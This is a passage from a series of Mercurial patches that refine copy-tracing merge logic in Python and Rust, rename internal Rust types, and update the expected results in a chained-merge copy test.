other way + mS,QPm: chained merges (conflict -> simple) - different content + mT,PQm: chained merges (conflict -> simple) - different content n-1: unrelated changes (based on the "f" series of changes) o-1: unrelated changes (based on "g" changes) p-1: t -move-> u @@ -1338,6 +1441,8 @@ q-2 w -move-> v r-1: rename r -> x r-2: rename t -> x + s-1: unrelated changes (based on the "p" series of changes) + t-1: unrelated changes (based on "q" changes) Test that sidedata computations during upgrades are correct @@ -1681,6 +1786,32 @@ 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' + ##### revision "s-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-s' + added : unrelated-s, ; + ##### revision "t-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-t' + added : unrelated-t, ; + ##### revision "mPQ,Tm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mT,PQm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mQP,Sm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mS,QPm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' ##### revision "l-1" ##### 1 sidedata entries entry-0014 size 24 @@ -3079,6 +3210,55 @@ a (known-bad-output sidedata !) a (known-bad-output upgraded !) +Subcase: chaining conflicting rename resolution +``````````````````````````````````````````````` + +The "mPQm" and "mQPm" case create a rename tracking conflict on file 'v'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'v' and the arbitration done within "mPQm" and "mQP" +about that file should stay unchanged. + +The result from mPQm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQm")' v + A v + r (filelog !) + p (sidedata !) 
+ p (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQ,Tm")' v + A v + r (filelog !) + p (sidedata !) + p (upgraded !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mT,PQm")' v + A v + r (filelog !) + p (missing-correct-output sidedata !) + p (missing-correct-output upgraded !) + r (known-bad-output sidedata !) + r (known-bad-output upgraded !) + + +The result from mQPm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQPm")' v + A v + r (no-changeset no-compatibility !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQP,Sm")' v + A v + r (no-changeset no-compatibility !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mS,QPm")' v + A v + r (filelog !) + r (missing-correct-output sidedata !) + r (missing-correct-output upgraded !) + p (known-bad-output sidedata !) + p (known-bad-output upgraded !) + Subcase: chaining salvage information during a merge ```````````````````````````````````````````````````` # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1607970393 -3600 # Mon Dec 14 19:26:33 2020 +0100 # Node ID c692384bb559b4210e80774bcf8974e543face01 # Parent 388a92023a1afdb38e6c6ed4f2100287c2af59c9 copies: rearrange all value comparison conditional To properly handle the newly tested case (chaining of merges) we will need to detect more accurately when an actualy merging of the copy information (and superseed the two existing data). Before starting to do so, we need to reorganise the values comparison to introduce different conditional branches when such actual merging is needed/detected. To avoid mixing too many change in this complicated code, we do the reorganisation before adding the "overwrite detection" logic in the next changesets. 
Differential Revision: https://phab.mercurial-scm.org/D9612 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -481,32 +481,60 @@ def _compare_values(changes, isancestor, dest, minor, major): - """compare two value within a _merge_copies_dict loop iteration""" + """compare two value within a _merge_copies_dict loop iteration + + return pick + + - pick is one of PICK_MINOR, PICK_MAJOR or PICK_EITHER + """ major_tt, major_value = major minor_tt, minor_value = minor - # evacuate some simple case first: if major_tt == minor_tt: # if it comes from the same revision it must be the same value assert major_value == minor_value return PICK_EITHER - elif major[1] == minor[1]: - return PICK_EITHER - - # actual merging needed: content from "major" wins, unless it is older than - # the branch point or there is a merge - elif changes is not None and major[1] is None and dest in changes.salvaged: + elif ( + changes is not None + and minor_value is not None + and major_value is None + and dest in changes.salvaged + ): + # In this case, a deletion was reverted, the "alive" value overwrite + # the deleted one. return PICK_MINOR - elif changes is not None and minor[1] is None and dest in changes.salvaged: + elif ( + changes is not None + and major_value is not None + and minor_value is None + and dest in changes.salvaged + ): + # In this case, a deletion was reverted, the "alive" value overwrite + # the deleted one. return PICK_MAJOR - elif changes is not None and dest in changes.merged: + elif isancestor(minor_tt, major_tt): + if changes is not None and dest in changes.merged: + # change to dest happened on the branch without copy-source change, + # so both source are valid and "major" wins. 
+ return PICK_MAJOR + else: + return PICK_MAJOR + elif isancestor(major_tt, minor_tt): + if changes is not None and dest in changes.merged: + # change to dest happened on the branch without copy-source change, + # so both source are valid and "major" wins. + return PICK_MAJOR + else: + return PICK_MINOR + elif minor_value is None: + # in case of conflict, the "alive" side wins. return PICK_MAJOR - elif not isancestor(major_tt, minor_tt): - if major[1] is not None: - return PICK_MAJOR - elif isancestor(minor_tt, major_tt): - return PICK_MAJOR - return PICK_MINOR + elif major_value is None: + # in case of conflict, the "alive" side wins. + return PICK_MINOR + else: + # in case of conflict where both side are alive, major wins. + return PICK_MAJOR def _revinfo_getter_extra(repo): diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -746,6 +746,8 @@ MergePick::Any } else if oracle.is_overwrite(src_major.rev, src_minor.rev) { MergePick::Minor + } else if oracle.is_overwrite(src_minor.rev, src_major.rev) { + MergePick::Major } else { MergePick::Major } @@ -753,45 +755,61 @@ // We cannot get copy information for both p1 and p2 in the // same rev. So this is the same value. 
unreachable!( - "conflict information from p1 and p2 in the same revision" + "conflicting information from p1 and p2 in the same revision" ); } else { let dest_path = path_map.untokenize(*dest); let action = changes.get_merge_case(dest_path); - if src_major.path.is_none() && action == MergeCase::Salvaged { + if src_minor.path.is_some() + && src_major.path.is_none() + && action == MergeCase::Salvaged + { // If the file is "deleted" in the major side but was // salvaged by the merge, we keep the minor side alive MergePick::Minor - } else if src_minor.path.is_none() && action == MergeCase::Salvaged { + } else if src_major.path.is_some() + && src_minor.path.is_none() + && action == MergeCase::Salvaged + { // If the file is "deleted" in the minor side but was // salvaged by the merge, unconditionnaly preserve the // major side. MergePick::Major - } else if action == MergeCase::Merged { - // If the file was actively merged, copy information - // from each side might conflict. The major side will - // win such conflict. - MergePick::Major + } else if oracle.is_overwrite(src_minor.rev, src_major.rev) { + // The information from the minor version are strictly older than + // the major version + if action == MergeCase::Merged { + // If the file was actively merged, its means some non-copy + // activity happened on the other branch. It + // mean the older copy information are still relevant. + // + // The major side wins such conflict. + MergePick::Major + } else { + // No activity on the minor branch, pick the newer one. + MergePick::Major + } } else if oracle.is_overwrite(src_major.rev, src_minor.rev) { - // If the minor side is strictly newer than the major - // side, it should be kept. - MergePick::Minor - } else if src_major.path.is_some() { - // without any special case, the "major" value win - // other the "minor" one. + if action == MergeCase::Merged { + // If the file was actively merged, its means some non-copy + // activity happened on the other branch. 
It + // mean the older copy information are still relevant. + // + // The major side wins such conflict. + MergePick::Major + } else { + // No activity on the minor branch, pick the newer one. + MergePick::Minor + } + } else if src_minor.path.is_none() { + // the minor side has no relevant information, pick the alive one MergePick::Major - } else if oracle.is_overwrite(src_minor.rev, src_major.rev) { - // the "major" rev is a direct ancestors of "minor", - // any different value should - // overwrite - MergePick::Major + } else if src_major.path.is_none() { + // the major side has no relevant information, pick the alive one + MergePick::Minor } else { - // major version is None (so the file was deleted on - // that branch) and that branch is independant (neither - // minor nor major is an ancestors of the other one.) - // We preserve the new - // information about the new file. - MergePick::Minor + // by default the major side wins + MergePick::Major } } } # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1607798108 -3600 # Sat Dec 12 19:35:08 2020 +0100 # Node ID c19c662097e160402188091020386a456e5ebaa3 # Parent c692384bb559b4210e80774bcf8974e543face01 copies: detect case when a merge decision overwrite previous data We now detect and record when a merge case required special logic (eg: thing that append during the merge, ambiguity leading to picking p1 data, etc) and we explicitly mark the result as superseding the previous data. This fixes the family of test we previously added. Differential Revision: https://phab.mercurial-scm.org/D9613 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -434,7 +434,11 @@ # potential filelog related behavior. 
assert parent == 2 current_copies = _merge_copies_dict( - newcopies, current_copies, isancestor, changes + newcopies, + current_copies, + isancestor, + changes, + current_rev, ) all_copies[current_rev] = current_copies @@ -456,7 +460,7 @@ PICK_EITHER = 2 -def _merge_copies_dict(minor, major, isancestor, changes): +def _merge_copies_dict(minor, major, isancestor, changes, current_merge): """merge two copies-mapping together, minor and major In case of conflict, value from "major" will be picked. @@ -474,8 +478,15 @@ if other is None: minor[dest] = value else: - pick = _compare_values(changes, isancestor, dest, other, value) - if pick == PICK_MAJOR: + pick, overwrite = _compare_values( + changes, isancestor, dest, other, value + ) + if overwrite: + if pick == PICK_MAJOR: + minor[dest] = (current_merge, value[1]) + else: + minor[dest] = (current_merge, other[1]) + elif pick == PICK_MAJOR: minor[dest] = value return minor @@ -483,9 +494,10 @@ def _compare_values(changes, isancestor, dest, minor, major): """compare two value within a _merge_copies_dict loop iteration - return pick + return (pick, overwrite). - pick is one of PICK_MINOR, PICK_MAJOR or PICK_EITHER + - overwrite is True if pick is a return of an ambiguity that needs resolution. """ major_tt, major_value = major minor_tt, minor_value = minor @@ -493,7 +505,7 @@ if major_tt == minor_tt: # if it comes from the same revision it must be the same value assert major_value == minor_value - return PICK_EITHER + return PICK_EITHER, False elif ( changes is not None and minor_value is not None @@ -502,7 +514,7 @@ ): # In this case, a deletion was reverted, the "alive" value overwrite # the deleted one. - return PICK_MINOR + return PICK_MINOR, True elif ( changes is not None and major_value is not None @@ -511,30 +523,30 @@ ): # In this case, a deletion was reverted, the "alive" value overwrite # the deleted one. 
- return PICK_MAJOR + return PICK_MAJOR, True elif isancestor(minor_tt, major_tt): if changes is not None and dest in changes.merged: # change to dest happened on the branch without copy-source change, # so both source are valid and "major" wins. - return PICK_MAJOR + return PICK_MAJOR, True else: - return PICK_MAJOR + return PICK_MAJOR, False elif isancestor(major_tt, minor_tt): if changes is not None and dest in changes.merged: # change to dest happened on the branch without copy-source change, # so both source are valid and "major" wins. - return PICK_MAJOR + return PICK_MAJOR, True else: - return PICK_MINOR + return PICK_MINOR, False elif minor_value is None: # in case of conflict, the "alive" side wins. - return PICK_MAJOR + return PICK_MAJOR, True elif major_value is None: # in case of conflict, the "alive" side wins. - return PICK_MINOR + return PICK_MINOR, True else: # in case of conflict where both side are alive, major wins. - return PICK_MAJOR + return PICK_MAJOR, True def _revinfo_getter_extra(repo): diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -568,20 +568,20 @@ // This closure exist as temporary help while multiple developper are // actively working on this code. Feel free to re-inline it once this // code is more settled. 
- let mut cmp_value = - |dest: &PathToken, - src_minor: &TimeStampedPathCopy, - src_major: &TimeStampedPathCopy| { - compare_value( - path_map, - current_merge, - changes, - oracle, - dest, - src_minor, - src_major, - ) - }; + let cmp_value = |oracle: &mut AncestorOracle<A>, + dest: &PathToken, + src_minor: &TimeStampedPathCopy, + src_major: &TimeStampedPathCopy| { + compare_value( + path_map, + current_merge, + changes, + oracle, + dest, + src_minor, + src_major, + ) + }; if minor.is_empty() { major } else if major.is_empty() { @@ -605,11 +605,30 @@ for (dest, src_minor) in minor { let src_major = major.get(&dest); match src_major { - None => major.insert(dest, src_minor), + None => { + major.insert(dest, src_minor); + } Some(src_major) => { - match cmp_value(&dest, &src_minor, src_major) { - MergePick::Any | MergePick::Major => None, - MergePick::Minor => major.insert(dest, src_minor), + let (pick, overwrite) = + cmp_value(oracle, &dest, &src_minor, src_major); + if overwrite { + oracle.record_overwrite(src_minor.rev, current_merge); + oracle.record_overwrite(src_major.rev, current_merge); + let path = match pick { + MergePick::Major => src_major.path, + MergePick::Minor => src_minor.path, + MergePick::Any => src_major.path, + }; + let src = TimeStampedPathCopy { + rev: current_merge, + path, + }; + major.insert(dest, src); + } else { + match pick { + MergePick::Any | MergePick::Major => None, + MergePick::Minor => major.insert(dest, src_minor), + }; } } }; @@ -621,11 +640,30 @@ for (dest, src_major) in major { let src_minor = minor.get(&dest); match src_minor { - None => minor.insert(dest, src_major), + None => { + minor.insert(dest, src_major); + } Some(src_minor) => { - match cmp_value(&dest, src_minor, &src_major) { - MergePick::Any | MergePick::Minor => None, - MergePick::Major => minor.insert(dest, src_major), + let (pick, overwrite) = + cmp_value(oracle, &dest, &src_major, src_minor); + if overwrite { + oracle.record_overwrite(src_minor.rev, 
current_merge); + oracle.record_overwrite(src_major.rev, current_merge); + let path = match pick { + MergePick::Major => src_minor.path, + MergePick::Minor => src_major.path, + MergePick::Any => src_major.path, + }; + let src = TimeStampedPathCopy { + rev: current_merge, + path, + }; + minor.insert(dest, src); + } else { + match pick { + MergePick::Any | MergePick::Major => None, + MergePick::Minor => minor.insert(dest, src_major), + }; } } }; @@ -663,12 +701,32 @@ DiffItem::Update { old, new } => { let (dest, src_major) = new; let (_, src_minor) = old; - match cmp_value(dest, src_minor, src_major) { - MergePick::Major => to_minor(dest, src_major), - MergePick::Minor => to_major(dest, src_minor), - // If the two entry are identical, no need to do - // anything (but diff should not have yield them) - MergePick::Any => unreachable!(), + let (pick, overwrite) = + cmp_value(oracle, dest, src_minor, src_major); + if overwrite { + oracle.record_overwrite(src_minor.rev, current_merge); + oracle.record_overwrite(src_major.rev, current_merge); + let path = match pick { + MergePick::Major => src_major.path, + MergePick::Minor => src_minor.path, + // If the two entry are identical, no need to do + // anything (but diff should not have yield them) + MergePick::Any => src_major.path, + }; + let src = TimeStampedPathCopy { + rev: current_merge, + path, + }; + to_minor(dest, &src); + to_major(dest, &src); + } else { + match pick { + MergePick::Major => to_minor(dest, src_major), + MergePick::Minor => to_major(dest, src_minor), + // If the two entry are identical, no need to do + // anything (but diff should not have yield them) + MergePick::Any => unreachable!(), + } } } }; @@ -717,39 +775,37 @@ dest: &PathToken, src_minor: &TimeStampedPathCopy, src_major: &TimeStampedPathCopy, -) -> MergePick { +) -> (MergePick, bool) { if src_major.rev == current_merge { if src_minor.rev == current_merge { if src_major.path.is_none() { // We cannot get different copy information for both p1 and 
p2 // from the same revision. Unless this was a // deletion - MergePick::Any + (MergePick::Any, false) } else { unreachable!(); } } else { // The last value comes the current merge, this value -will- win // eventually. - oracle.record_overwrite(src_minor.rev, src_major.rev); - MergePick::Major + (MergePick::Major, true) } } else if src_minor.rev == current_merge { // The last value comes the current merge, this value -will- win // eventually. - oracle.record_overwrite(src_major.rev, src_minor.rev); - MergePick::Minor + (MergePick::Minor, true) } else if src_major.path == src_minor.path { // we have the same value, but from other source; if src_major.rev == src_minor.rev { // If the two entry are identical, they are both valid - MergePick::Any + (MergePick::Any, false) } else if oracle.is_overwrite(src_major.rev, src_minor.rev) { - MergePick::Minor + (MergePick::Minor, false) } else if oracle.is_overwrite(src_minor.rev, src_major.rev) { - MergePick::Major + (MergePick::Major, false) } else { - MergePick::Major + (MergePick::Any, true) } } else if src_major.rev == src_minor.rev { // We cannot get copy information for both p1 and p2 in the @@ -766,7 +822,7 @@ { // If the file is "deleted" in the major side but was // salvaged by the merge, we keep the minor side alive - MergePick::Minor + (MergePick::Minor, true) } else if src_major.path.is_some() && src_minor.path.is_none() && action == MergeCase::Salvaged @@ -774,7 +830,7 @@ // If the file is "deleted" in the minor side but was // salvaged by the merge, unconditionnaly preserve the // major side. - MergePick::Major + (MergePick::Major, true) } else if oracle.is_overwrite(src_minor.rev, src_major.rev) { // The information from the minor version are strictly older than // the major version @@ -784,10 +840,10 @@ // mean the older copy information are still relevant. // // The major side wins such conflict. - MergePick::Major + (MergePick::Major, true) } else { // No activity on the minor branch, pick the newer one. 
- MergePick::Major + (MergePick::Major, false) } } else if oracle.is_overwrite(src_major.rev, src_minor.rev) { if action == MergeCase::Merged { @@ -796,20 +852,20 @@ // mean the older copy information are still relevant. // // The major side wins such conflict. - MergePick::Major + (MergePick::Major, true) } else { // No activity on the minor branch, pick the newer one. - MergePick::Minor + (MergePick::Minor, false) } } else if src_minor.path.is_none() { // the minor side has no relevant information, pick the alive one - MergePick::Major + (MergePick::Major, true) } else if src_major.path.is_none() { // the major side has no relevant information, pick the alive one - MergePick::Minor + (MergePick::Minor, true) } else { // by default the major side wins - MergePick::Major + (MergePick::Major, true) } } } diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -3182,10 +3182,8 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AEm")' f A f a (filelog !) - a (missing-correct-output sidedata !) - a (missing-correct-output upgraded !) - b (known-bad-output sidedata !) - b (known-bad-output upgraded !) + a (sidedata !) + a (upgraded !) The result from mEAm is the same for the subsequent merge: @@ -3205,10 +3203,8 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EAm")' f A f a (filelog !) - b (missing-correct-output sidedata !) - b (missing-correct-output upgraded !) - a (known-bad-output sidedata !) - a (known-bad-output upgraded !) + b (sidedata !) + b (upgraded !) Subcase: chaining conflicting rename resolution ``````````````````````````````````````````````` @@ -3235,10 +3231,8 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mT,PQm")' v A v r (filelog !) - p (missing-correct-output sidedata !) - p (missing-correct-output upgraded !) - r (known-bad-output sidedata !) - r (known-bad-output upgraded !) + p (sidedata !) + p (upgraded !) 
The result from mQPm is the same for the subsequent merge: @@ -3254,10 +3248,8 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mS,QPm")' v A v r (filelog !) - r (missing-correct-output sidedata !) - r (missing-correct-output upgraded !) - p (known-bad-output sidedata !) - p (known-bad-output upgraded !) + r (sidedata !) + r (upgraded !) Subcase: chaining salvage information during a merge @@ -3271,9 +3263,7 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB-revert-m-0")' M b A d - a (filelog !) - a (sidedata !) - a (upgraded !) + a (no-changeset no-compatibility !) A t p R a @@ -3281,22 +3271,17 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-revert-m-0")' M b A d - a (filelog !) - a (sidedata !) - a (upgraded !) + a (no-changeset no-compatibility !) A t p R a R p chained output - $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC+revert,Lm")' M b A d - a (filelog !) - a (missing-correct-output sidedata !) - a (missing-correct-output upgraded !) + a (no-changeset no-compatibility !) A t p A unrelated-l @@ -3305,9 +3290,7 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB+revert,Lm")' M b A d - a (filelog !) - a (missing-correct-output sidedata !) - a (missing-correct-output upgraded !) + a (no-changeset no-compatibility !) A t p A unrelated-l @@ -3316,9 +3299,7 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,BC+revertm")' M b A d - a (filelog !) - a (missing-correct-output sidedata !) - a (missing-correct-output upgraded !) + a (no-changeset no-compatibility !) A t p A unrelated-l @@ -3327,9 +3308,7 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,CB+revertm")' M b A d - a (filelog !) - a (missing-correct-output sidedata !) - a (missing-correct-output upgraded !) + a (no-changeset no-compatibility !) A t p A unrelated-l @@ -3373,18 +3352,10 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGF,Nm")' d A d - a (filelog !) - a (missing-correct-output sidedata !) 
- a (missing-correct-output upgraded !) - h (known-bad-output sidedata !) - h (known-bad-output upgraded !) + a (no-changeset no-compatibility !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mN,GFm")' d A d - a (filelog !) - a (missing-correct-output sidedata !) - a (missing-correct-output upgraded !) - h (known-bad-output sidedata !) - h (known-bad-output upgraded !) + a (no-changeset no-compatibility !) Subcase: chaining conflicting rename resolution, with extra change during the merge @@ -3411,11 +3382,7 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AE-change-m")' f A f - a (filelog !) - a (missing-correct-output sidedata !) - a (missing-correct-output upgraded !) - b (known-bad-output sidedata !) - b (known-bad-output upgraded !) + a (no-changeset no-compatibility !) The result from mEAm is the same for the subsequent merge: @@ -3435,7 +3402,5 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EA-change-m")' f A f a (filelog !) - b (missing-correct-output sidedata !) - b (missing-correct-output upgraded !) - a (known-bad-output sidedata !) - a (known-bad-output upgraded !) + b (sidedata !) + b (upgraded !) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608049560 -3600 # Tue Dec 15 17:26:00 2020 +0100 # Node ID 313610be4147847eda611772a020c0834c9db974 # Parent c19c662097e160402188091020386a456e5ebaa3 copies-rust: rename TimeStampedPathCopies to InternalPathCopies We are looking into moving away from TimeStampedPathCopy (that use is_ancestors call to detect overwrite) in favor of an approach that does not requires is_ancestors calls. Yet we will still need an internal representation that differs from the returned result. So we call it "InternalPathCopies" which is generic but clear. 
Differential Revision: https://phab.mercurial-scm.org/D9641 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -25,7 +25,7 @@ } /// maps CopyDestination to Copy Source (+ a "timestamp" for the operation) -type TimeStampedPathCopies = OrdMap<PathToken, TimeStampedPathCopy>; +type InternalPathCopies = OrdMap<PathToken, TimeStampedPathCopy>; /// hold parent 1, parent 2 and relevant files actions. pub type RevInfo<'a> = (Revision, Revision, ChangedFiles<'a>); @@ -382,7 +382,7 @@ // We will chain the copies information accumulated for the parent with // the individual copies information the curent revision. Creating a // new TimeStampedPath for each `rev` → `children` vertex. - let mut copies: Option<TimeStampedPathCopies> = None; + let mut copies: Option<InternalPathCopies> = None; if p1 != NULL_REVISION { // Retrieve data computed in a previous iteration let parent_copies = get_and_clean_parent_copies( @@ -471,21 +471,21 @@ /// /// If parent is not part of the set we are expected to walk, return None. 
fn get_and_clean_parent_copies( - all_copies: &mut HashMap<Revision, TimeStampedPathCopies>, + all_copies: &mut HashMap<Revision, InternalPathCopies>, children_count: &mut HashMap<Revision, usize>, parent_rev: Revision, -) -> Option<TimeStampedPathCopies> { +) -> Option<InternalPathCopies> { let count = children_count.get_mut(&parent_rev)?; *count -= 1; if *count == 0 { match all_copies.remove(&parent_rev) { Some(c) => Some(c), - None => Some(TimeStampedPathCopies::default()), + None => Some(InternalPathCopies::default()), } } else { match all_copies.get(&parent_rev) { Some(c) => Some(c.clone()), - None => Some(TimeStampedPathCopies::default()), + None => Some(InternalPathCopies::default()), } } } @@ -495,11 +495,11 @@ fn add_from_changes<A: Fn(Revision, Revision) -> bool>( path_map: &mut TwoWayPathMap, oracle: &mut AncestorOracle<A>, - base_copies: &TimeStampedPathCopies, + base_copies: &InternalPathCopies, changes: &ChangedFiles, parent: Parent, current_rev: Revision, -) -> TimeStampedPathCopies { +) -> InternalPathCopies { let mut copies = base_copies.clone(); for action in changes.iter_actions(parent) { match action { @@ -540,7 +540,7 @@ // // We need to explicitly record them as dropped to // propagate this information when merging two - // TimeStampedPathCopies object. + // InternalPathCopies object. let deleted = path_map.tokenize(deleted_path); copies.entry(deleted).and_modify(|old| { oracle.record_overwrite(old.rev, current_rev); @@ -560,11 +560,11 @@ fn merge_copies_dict<A: Fn(Revision, Revision) -> bool>( path_map: &TwoWayPathMap, current_merge: Revision, - mut minor: TimeStampedPathCopies, - mut major: TimeStampedPathCopies, + mut minor: InternalPathCopies, + mut major: InternalPathCopies, changes: &ChangedFiles, oracle: &mut AncestorOracle<A>, -) -> TimeStampedPathCopies { +) -> InternalPathCopies { // This closure exist as temporary help while multiple developper are // actively working on this code. 
Feel free to re-inline it once this // code is more settled. @@ -587,7 +587,7 @@ } else if major.is_empty() { minor } else if minor.len() * 2 < major.len() { - // Lets says we are merging two TimeStampedPathCopies instance A and B. + // Lets says we are merging two InternalPathCopies instance A and B. // // If A contains N items, the merge result will never contains more // than N values differents than the one in A @@ -601,7 +601,7 @@ // between A and B. // // This help performance a lot in case were a tiny - // TimeStampedPathCopies is merged with a much larger one. + // InternalPathCopies is merged with a much larger one. for (dest, src_minor) in minor { let src_major = major.get(&dest); match src_major { @@ -755,7 +755,7 @@ } /// represent the side that should prevail when merging two -/// TimeStampedPathCopies +/// InternalPathCopies enum MergePick { /// The "major" (p1) side prevails Major, # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608536550 -3600 # Mon Dec 21 08:42:30 2020 +0100 # Node ID 2bd069788367608b2f67273c5b3cdcc0b3f3ed6f # Parent 313610be4147847eda611772a020c0834c9db974 copies-rust: rename TimeStampedPathCopy to CopySource Same rational as the previous changesets. CopySource is a clear descriptive name that does not depends on an implementation details that we are about to the change. 
Differential Revision: https://phab.mercurial-scm.org/D9642 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -16,7 +16,7 @@ type PathToken = usize; #[derive(Clone, Debug, PartialEq, Copy)] -struct TimeStampedPathCopy { +struct CopySource { /// revision at which the copy information was added rev: Revision, /// the copy source, (Set to None in case of deletion of the associated @@ -25,7 +25,7 @@ } /// maps CopyDestination to Copy Source (+ a "timestamp" for the operation) -type InternalPathCopies = OrdMap<PathToken, TimeStampedPathCopy>; +type InternalPathCopies = OrdMap<PathToken, CopySource>; /// hold parent 1, parent 2 and relevant files actions. pub type RevInfo<'a> = (Revision, Revision, ChangedFiles<'a>); @@ -521,7 +521,7 @@ // information. See merge_copies_dict for details. match copies.entry(dest) { Entry::Vacant(slot) => { - let ttpc = TimeStampedPathCopy { + let ttpc = CopySource { rev: current_rev, path: entry, }; @@ -570,8 +570,8 @@ // code is more settled. 
let cmp_value = |oracle: &mut AncestorOracle<A>, dest: &PathToken, - src_minor: &TimeStampedPathCopy, - src_major: &TimeStampedPathCopy| { + src_minor: &CopySource, + src_major: &CopySource| { compare_value( path_map, current_merge, @@ -619,7 +619,7 @@ MergePick::Minor => src_minor.path, MergePick::Any => src_major.path, }; - let src = TimeStampedPathCopy { + let src = CopySource { rev: current_merge, path, }; @@ -654,7 +654,7 @@ MergePick::Minor => src_major.path, MergePick::Any => src_major.path, }; - let src = TimeStampedPathCopy { + let src = CopySource { rev: current_merge, path, }; @@ -673,10 +673,10 @@ let mut override_minor = Vec::new(); let mut override_major = Vec::new(); - let mut to_major = |k: &PathToken, v: &TimeStampedPathCopy| { + let mut to_major = |k: &PathToken, v: &CopySource| { override_major.push((k.clone(), v.clone())) }; - let mut to_minor = |k: &PathToken, v: &TimeStampedPathCopy| { + let mut to_minor = |k: &PathToken, v: &CopySource| { override_minor.push((k.clone(), v.clone())) }; @@ -713,7 +713,7 @@ // anything (but diff should not have yield them) MergePick::Any => src_major.path, }; - let src = TimeStampedPathCopy { + let src = CopySource { rev: current_merge, path, }; @@ -773,8 +773,8 @@ changes: &ChangedFiles, oracle: &mut AncestorOracle<A>, dest: &PathToken, - src_minor: &TimeStampedPathCopy, - src_major: &TimeStampedPathCopy, + src_minor: &CopySource, + src_major: &CopySource, ) -> (MergePick, bool) { if src_major.rev == current_merge { if src_minor.rev == current_merge { # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608689073 -3600 # Wed Dec 23 03:04:33 2020 +0100 # Node ID 3c5a8b13206a53b0a0e8b6138ab5ffdc18fa048a # Parent 2bd069788367608b2f67273c5b3cdcc0b3f3ed6f copies-rust: fix reverted argument when merging tiny minor or major The argument where not passed in the right other. This is not caught by the test (yet) because it is a sub case of a special case. 
Am I adding this to my list of things to test. Using test directly in Rust would be appropriate here. However we don't have the ability to test this code that way yet, and I am focussing on other part of that work right now. Differential Revision: https://phab.mercurial-scm.org/D9657 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -645,7 +645,7 @@ } Some(src_minor) => { let (pick, overwrite) = - cmp_value(oracle, &dest, &src_major, src_minor); + cmp_value(oracle, &dest, src_minor, &src_major); if overwrite { oracle.record_overwrite(src_minor.rev, current_merge); oracle.record_overwrite(src_major.rev, current_merge); @@ -661,8 +661,8 @@ minor.insert(dest, src); } else { match pick { - MergePick::Any | MergePick::Major => None, - MergePick::Minor => minor.insert(dest, src_major), + MergePick::Any | MergePick::Minor => None, + MergePick::Major => minor.insert(dest, src_major), }; } } # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608689083 -3600 # Wed Dec 23 03:04:43 2020 +0100 # Node ID b6f65d90e8af3aabed7e85304d6ffa3d2dda485b # Parent 3c5a8b13206a53b0a0e8b6138ab5ffdc18fa048a copies-rust: add methods to build and update CopySource Having explicit method with clear semantic help to clarify the code and prepare an update to the underlying documentation without too much disruption. 
